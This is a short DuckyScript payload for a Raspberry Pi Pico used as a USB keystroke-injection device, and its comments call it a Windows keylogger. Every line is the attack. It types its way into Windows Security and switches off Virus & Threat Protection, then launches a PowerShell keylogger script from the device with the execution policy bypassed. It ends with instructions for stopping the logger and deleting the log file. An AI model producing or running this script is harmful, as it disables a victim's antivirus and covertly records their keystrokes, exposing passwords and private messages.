REM Windows Keylogger using Raspberry Pi Pico 2
REM Logs save to keylogs.txt
REM To stop: Open task manager, go to the details tab, add command line column, end the correct powershell process, eject Pico and delete keylogs.txt

DELAY 4000

REM Disable Virus & Threat Protection
CONTROL ESCAPE
DELAY 1000
STRING virus protection
DELAY 2000
ENTER
DELAY 2000
TAB
DELAY 1000
TAB
DELAY 1000
TAB
DELAY 2000
TAB
DELAY 1500
ENTER
DELAY 1500
SPACE
DELAY 1500
LEFT
DELAY 1500
ENTER
DELAY 1000
ALT F4

REM Find CIRCUITPY and run script
DELAY 2000
GUI r
DELAY 500
STRING powershell -ep bypass -File D:/keylogger.ps1
ENTER